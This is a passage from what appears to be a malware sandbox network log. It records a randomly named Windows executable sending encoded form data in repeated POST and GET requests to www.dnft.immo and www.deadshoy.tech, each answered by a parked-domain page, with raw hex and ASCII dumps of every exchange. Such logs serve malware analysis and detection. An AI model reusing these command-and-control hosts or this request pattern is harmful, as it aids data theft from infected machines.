                                                        Dec 10, 2024 18:49:14.391400099 CET506INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDA1M2ViNGMtOGI1Yy00ZjRlLWEzYmYtYTY0MTgwZTIwM2VkIiwicGFnZV90aW1lIjoxNzMzODUyOTU0LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuZG5mdC5pbW1vL3lla3k


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        11192.168.11.2049766199.59.243.227807508C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 10, 2024 18:49:16.925659895 CET2578OUTPOST /yeky/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Content-Length: 7367
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Host: www.dnft.immo
                                                        Origin: http://www.dnft.immo
                                                        Referer: http://www.dnft.immo/yeky/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                        Data Raw: 51 54 3d 32 4e 65 57 49 31 6a 63 59 6c 44 48 7a 31 77 74 77 4b 32 72 56 76 76 77 52 34 77 63 66 48 59 63 55 53 65 68 7a 63 6f 62 50 65 42 57 6c 2b 68 51 61 6e 41 65 68 79 39 51 33 43 30 37 76 7a 70 39 4d 6d 2b 39 51 53 4d 63 73 73 62 6f 52 35 63 79 44 61 61 58 64 31 75 38 66 5a 63 68 57 44 39 70 49 37 54 72 63 48 6c 38 34 72 76 61 52 30 53 4f 56 33 58 4a 53 47 30 39 62 76 2b 68 43 37 35 57 35 6e 68 68 30 43 41 33 4d 41 70 71 35 62 49 4d 53 4f 51 44 41 4f 73 48 6f 46 2f 75 53 6a 78 46 6b 6e 52 72 58 6b 56 45 50 4f 43 6f 34 65 65 38 62 43 6f 2b 47 57 37 4f 34 7a 65 33 31 55 79 65 63 79 6f 33 39 6b 34 61 49 45 6f 56 6f 70 37 2b 32 38 33 5a 55 63 6e 6e 2b 6a 67 71 6c 35 5a 2b 6e 4a 52 44 70 41 52 50 33 79 48 6c 67 69 41 2f 73 57 59 4e 72 6a 30 34 6a 39 62 47 4d 46 79 49 70 52 52 6b 6d 65 48 49 30 58 73 4e 68 46 38 6f 6e 6c 36 4c 75 6a 69 2b 46 38 69 6a 43 4c 73 42 32 6d 32 36 61 39 52 58 7a 7a 67 61 66 68 72 52 74 43 6f 4d 74 65 73 56 39 46 61 41 53 44 78 4a 51 47 57 50 39 38 69 75 48 4e 76 62 66 71 61 [TRUNCATED]
                                                        Data Ascii: QT=2NeWI1jcYlDHz1wtwK2rVvvwR4wcfHYcUSehzcobPeBWl+hQanAehy9Q3C07vzp9Mm+9QSMcssboR5cyDaaXd1u8fZchWD9pI7TrcHl84rvaR0SOV3XJSG09bv+hC75W5nhh0CA3MApq5bIMSOQDAOsHoF/uSjxFknRrXkVEPOCo4ee8bCo+GW7O4ze31Uyecyo39k4aIEoVop7+283ZUcnn+jgql5Z+nJRDpARP3yHlgiA/sWYNrj04j9bGMFyIpRRkmeHI0XsNhF8onl6Luji+F8ijCLsB2m26a9RXzzgafhrRtCoMtesV9FaASDxJQGWP98iuHNvbfqa34jK39VnCU1Qs/G5IryorHTmY+TBuk3FLKXiTUPpopa9fY7e3u5Fq7iOxfYItztyxz8dvxd9lCC0ppCqBqltGMYml8IHmkwVsMW2y3wolRmlzMCRUkfwgyKp5dAHrNH9fL0DQqAeflLmRfssLmS3PBDHQOi6WVmQiAnIP0Nw/WT+ARL05yFWDQJLTwbmWpviSESPGTVaaJ/dAHG1Myof7LjnoXIa+2zZKzs8u8Kprx1VkT2PvtGLGlUEKl5srO/NaEYKN3X85klg3eBf0ztVwNPC20MLx82eyfw3J3gW5fky8yYH8lR0PtbN/5pJ9i0G/UJVhg2ZGCCiKw8vBHGW6UDRTOhEgF3Dx/j+hB5Pf2JWkJx1XD99H2KEApyuwiT+mMYNJW4ApUAS1qBOOrJv1kD3zU3nKDje/WAI8UwcLMqdCLuNA8gRvKxZqPAcb7lQzm2spMdxH9iqYn1ZD+5K9ZM5VG+QRpbTdGUxqH+/lWauRPXBw13dGWpx7O+GAYVM+yhEUgN7tl3WOE5LtoJ6KDDqYVN3pmH9MFHBsGO+krWZvpQaJXEZA9/4IYsa73Uy1Ltwwhu3Vpk8OVfFe/J1j7Qo5+WoJbOL11UHXQUEm6/R0YrevYsqyiEbqrhz3JcGa3n36/zCDFs1UqDLGnJttCfoJhplwfegsQ [TRUNCATED]
                                                        Dec 10, 2024 18:49:16.925740957 CET5287OUTData Raw: 2b 5a 4b 4b 35 32 38 68 49 49 75 6c 61 34 6a 4d 70 4e 7a 42 75 71 77 58 45 6a 41 42 79 43 5a 62 69 36 41 4a 43 36 34 49 32 41 63 6b 55 4f 4b 67 61 44 69 6d 45 33 78 4c 66 4b 42 43 2b 31 75 37 57 73 46 68 4c 73 59 5a 65 45 56 39 37 54 49 6d 6f 62
                                                        Data Ascii: +ZKK528hIIula4jMpNzBuqwXEjAByCZbi6AJC64I2AckUOKgaDimE3xLfKBC+1u7WsFhLsYZeEV97TImobPMDou/aQtiL/CqVcw5jGBb769/UwT0dl7r5T7Dxqp2RLMN4WCHaurbfrG6dBNGkbu8FtCK8yxhXSYCoG6/jKYp6WNl9zj7aQKHB+5A08GbIEI8jDEnsdM1ZhunBTKDwcPDqd1TT+ZXHp1ekg/hwY4k4AmMMIfD70+
                                                        Dec 10, 2024 18:49:17.087289095 CET1289INHTTP/1.1 200 OK
                                                        date: Tue, 10 Dec 2024 17:49:16 GMT
                                                        content-type: text/html; charset=utf-8
                                                        content-length: 1106
                                                        x-request-id: ac43ae81-0f77-498b-84e9-93e0ade2a980
                                                        cache-control: no-store, max-age=0
                                                        accept-ch: sec-ch-prefers-color-scheme
                                                        critical-ch: sec-ch-prefers-color-scheme
                                                        vary: sec-ch-prefers-color-scheme
                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zN108GCxN5HSEoKJf+UuiRAWaP7cdmandpszlx5SAuzDuxpgGWgv6E8TCTtLY0Grf54lwuJJt0uW1+0Qg/tI6w==
                                                        set-cookie: parking_session=ac43ae81-0f77-498b-84e9-93e0ade2a980; expires=Tue, 10 Dec 2024 18:04:17 GMT; path=/
                                                        connection: close
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 7a 4e 31 30 38 47 43 78 4e 35 48 53 45 6f 4b 4a 66 2b 55 75 69 52 41 57 61 50 37 63 64 6d 61 6e 64 70 73 7a 6c 78 35 53 41 75 7a 44 75 78 70 67 47 57 67 76 36 45 38 54 43 54 74 4c 59 30 47 72 66 35 34 6c 77 75 4a 4a 74 30 75 57 31 2b 30 51 67 2f 74 49 36 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zN108GCxN5HSEoKJf+UuiRAWaP7cdmandpszlx5SAuzDuxpgGWgv6E8TCTtLY0Grf54lwuJJt0uW1+0Qg/tI6w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                        Dec 10, 2024 18:49:17.087317944 CET506INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYWM0M2FlODEtMGY3Ny00OThiLTg0ZTktOTNlMGFkZTJhOTgwIiwicGFnZV90aW1lIjoxNzMzODUyOTU3LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuZG5mdC5pbW1vL3lla3k


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        12192.168.11.2049767199.59.243.227807508C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 10, 2024 18:49:19.634412050 CET439OUTGET /yeky/?QT=7P22LBHaa1jf6nBJoZKhVMfAW6E6enltUQ790N9gWu5M59Q4JmwGsTkf7hc1wA5HSyz6dzInvvSoc7txVpadCya5VvUUehVECqXYJH1JxrXGdxyqb1WHUVg=&LLp=-2JPqdjXxxH4 HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.9
                                                        Connection: close
                                                        Host: www.dnft.immo
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                        Dec 10, 2024 18:49:19.804872990 CET1289INHTTP/1.1 200 OK
                                                        date: Tue, 10 Dec 2024 17:49:19 GMT
                                                        content-type: text/html; charset=utf-8
                                                        content-length: 1446
                                                        x-request-id: 0b2e3524-34d5-4c81-8ae9-163fb9679ae4
                                                        cache-control: no-store, max-age=0
                                                        accept-ch: sec-ch-prefers-color-scheme
                                                        critical-ch: sec-ch-prefers-color-scheme
                                                        vary: sec-ch-prefers-color-scheme
                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fm3qWo90fKnLEGfOVLOmKtzFuQlP8FVEaCBuHYVl0BJiGqSmKa2LblUxulz3XW0PbfcUOGd6sHiwarkcaEeWDA==
                                                        set-cookie: parking_session=0b2e3524-34d5-4c81-8ae9-163fb9679ae4; expires=Tue, 10 Dec 2024 18:04:19 GMT; path=/
                                                        connection: close
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 66 6d 33 71 57 6f 39 30 66 4b 6e 4c 45 47 66 4f 56 4c 4f 6d 4b 74 7a 46 75 51 6c 50 38 46 56 45 61 43 42 75 48 59 56 6c 30 42 4a 69 47 71 53 6d 4b 61 32 4c 62 6c 55 78 75 6c 7a 33 58 57 30 50 62 66 63 55 4f 47 64 36 73 48 69 77 61 72 6b 63 61 45 65 57 44 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fm3qWo90fKnLEGfOVLOmKtzFuQlP8FVEaCBuHYVl0BJiGqSmKa2LblUxulz3XW0PbfcUOGd6sHiwarkcaEeWDA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                        Dec 10, 2024 18:49:19.804924965 CET846INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMGIyZTM1MjQtMzRkNS00YzgxLThhZTktMTYzZmI5Njc5YWU0IiwicGFnZV90aW1lIjoxNzMzODUyOTU5LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuZG5mdC5pbW1vL3lla3k


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        13192.168.11.2049768199.59.243.227807508C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 10, 2024 18:49:25.116887093 CET708OUTPOST /0sq9/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Content-Length: 199
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Host: www.deadshoy.tech
                                                        Origin: http://www.deadshoy.tech
                                                        Referer: http://www.deadshoy.tech/0sq9/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                        Data Raw: 51 54 3d 39 42 45 4d 67 54 6a 6d 69 2b 41 36 39 6c 51 6a 31 4a 44 2b 75 77 59 38 38 64 7a 6e 5a 50 37 63 66 56 71 6e 62 4b 73 75 59 6a 67 74 56 69 4d 69 76 67 71 39 6a 39 42 33 61 64 72 48 49 4f 55 4f 2b 30 59 36 57 6a 4b 4f 59 4b 7a 68 4c 34 5a 75 2b 75 36 52 37 33 6d 6e 46 34 4c 51 4c 76 69 52 6b 47 32 36 4f 6e 77 45 6a 75 69 6b 76 4a 72 49 31 71 53 34 44 39 69 77 2b 65 57 70 6c 56 6c 72 58 62 71 53 2b 68 34 59 64 2b 4c 31 67 73 6c 31 6c 75 45 42 55 78 69 65 37 69 4c 75 4b 38 65 42 65 48 7a 52 53 75 4a 70 58 43 4f 46 6f 41 78 76 79 38 62 46 50 69 33 4d 37 56 4d 6a 2b 66 4d 74 4a 51 3d 3d
                                                        Data Ascii: QT=9BEMgTjmi+A69lQj1JD+uwY88dznZP7cfVqnbKsuYjgtViMivgq9j9B3adrHIOUO+0Y6WjKOYKzhL4Zu+u6R73mnF4LQLviRkG26OnwEjuikvJrI1qS4D9iw+eWplVlrXbqS+h4Yd+L1gsl1luEBUxie7iLuK8eBeHzRSuJpXCOFoAxvy8bFPi3M7VMj+fMtJQ==
                                                        Dec 10, 2024 18:49:25.252270937 CET1289INHTTP/1.1 200 OK
                                                        date: Tue, 10 Dec 2024 17:49:24 GMT
                                                        content-type: text/html; charset=utf-8
                                                        content-length: 1122
                                                        x-request-id: c131e8e5-4845-4c8e-8a5f-a5f8baba5c30
                                                        cache-control: no-store, max-age=0
                                                        accept-ch: sec-ch-prefers-color-scheme
                                                        critical-ch: sec-ch-prefers-color-scheme
                                                        vary: sec-ch-prefers-color-scheme
                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_r3Zja95x41qV/1q46b0tyutPUqOYxuTZt3vM5k7DEep6bs4Ty3V2kE30hm2HJIaYl9bdwHQmfTa0nDIbs2sKOw==
                                                        set-cookie: parking_session=c131e8e5-4845-4c8e-8a5f-a5f8baba5c30; expires=Tue, 10 Dec 2024 18:04:25 GMT; path=/
                                                        connection: close
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 72 33 5a 6a 61 39 35 78 34 31 71 56 2f 31 71 34 36 62 30 74 79 75 74 50 55 71 4f 59 78 75 54 5a 74 33 76 4d 35 6b 37 44 45 65 70 36 62 73 34 54 79 33 56 32 6b 45 33 30 68 6d 32 48 4a 49 61 59 6c 39 62 64 77 48 51 6d 66 54 61 30 6e 44 49 62 73 32 73 4b 4f 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_r3Zja95x41qV/1q46b0tyutPUqOYxuTZt3vM5k7DEep6bs4Ty3V2kE30hm2HJIaYl9bdwHQmfTa0nDIbs2sKOw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                        Dec 10, 2024 18:49:25.252481937 CET522INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzEzMWU4ZTUtNDg0NS00YzhlLThhNWYtYTVmOGJhYmE1YzMwIiwicGFnZV90aW1lIjoxNzMzODUyOTY1LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuZGVhZHNob3kudGVjaC8


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        14192.168.11.2049769199.59.243.227807508C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 10, 2024 18:49:27.773057938 CET728OUTPOST /0sq9/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Content-Length: 219
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Host: www.deadshoy.tech
                                                        Origin: http://www.deadshoy.tech
                                                        Referer: http://www.deadshoy.tech/0sq9/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                        Data Raw: 51 54 3d 39 42 45 4d 67 54 6a 6d 69 2b 41 36 2f 47 49 6a 30 72 72 2b 2f 51 59 7a 77 39 7a 6e 57 76 37 51 66 56 57 6e 62 4f 31 72 66 56 49 74 4d 48 6f 69 67 42 71 39 6d 39 42 33 55 39 72 43 46 75 55 4a 2b 30 63 49 57 6d 79 4f 59 4b 6e 68 4c 39 6c 75 2f 66 36 53 30 48 6d 68 4e 59 4c 46 47 50 69 52 6b 47 32 36 4f 6e 6c 4d 6a 76 47 6b 75 35 62 49 6b 2f 2b 37 50 64 69 2f 37 65 57 70 33 6c 6c 33 58 62 71 4b 2b 6b 67 79 64 38 44 31 67 74 56 31 6c 61 6f 4f 65 78 69 51 6d 79 4b 69 42 4f 72 4a 65 48 4b 6e 55 74 6c 49 53 6a 66 39 67 32 38 31 76 4f 76 68 4d 78 72 2b 2f 6c 31 4c 38 64 4e 32 55 62 35 59 34 37 6e 6e 2b 51 46 63 31 37 73 68 2b 5a 58 63 37 74 45 3d
                                                        Data Ascii: QT=9BEMgTjmi+A6/GIj0rr+/QYzw9znWv7QfVWnbO1rfVItMHoigBq9m9B3U9rCFuUJ+0cIWmyOYKnhL9lu/f6S0HmhNYLFGPiRkG26OnlMjvGku5bIk/+7Pdi/7eWp3ll3XbqK+kgyd8D1gtV1laoOexiQmyKiBOrJeHKnUtlISjf9g281vOvhMxr+/l1L8dN2Ub5Y47nn+QFc17sh+ZXc7tE=
                                                        Dec 10, 2024 18:49:27.908334970 CET1289INHTTP/1.1 200 OK
                                                        date: Tue, 10 Dec 2024 17:49:27 GMT
                                                        content-type: text/html; charset=utf-8
                                                        content-length: 1122
                                                        x-request-id: c87c72c2-9440-42cc-9d09-e09d31a1c5cd
                                                        cache-control: no-store, max-age=0
                                                        accept-ch: sec-ch-prefers-color-scheme
                                                        critical-ch: sec-ch-prefers-color-scheme
                                                        vary: sec-ch-prefers-color-scheme
                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_r3Zja95x41qV/1q46b0tyutPUqOYxuTZt3vM5k7DEep6bs4Ty3V2kE30hm2HJIaYl9bdwHQmfTa0nDIbs2sKOw==
                                                        set-cookie: parking_session=c87c72c2-9440-42cc-9d09-e09d31a1c5cd; expires=Tue, 10 Dec 2024 18:04:27 GMT; path=/
                                                        connection: close
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 72 33 5a 6a 61 39 35 78 34 31 71 56 2f 31 71 34 36 62 30 74 79 75 74 50 55 71 4f 59 78 75 54 5a 74 33 76 4d 35 6b 37 44 45 65 70 36 62 73 34 54 79 33 56 32 6b 45 33 30 68 6d 32 48 4a 49 61 59 6c 39 62 64 77 48 51 6d 66 54 61 30 6e 44 49 62 73 32 73 4b 4f 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_r3Zja95x41qV/1q46b0tyutPUqOYxuTZt3vM5k7DEep6bs4Ty3V2kE30hm2HJIaYl9bdwHQmfTa0nDIbs2sKOw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                        Dec 10, 2024 18:49:27.908508062 CET522INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzg3YzcyYzItOTQ0MC00MmNjLTlkMDktZTA5ZDMxYTFjNWNkIiwicGFnZV90aW1lIjoxNzMzODUyOTY3LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuZGVhZHNob3kudGVjaC8


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        15192.168.11.2049770199.59.243.227807508C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 10, 2024 18:49:30.428957939 CET1289OUTPOST /0sq9/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Content-Length: 7367
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
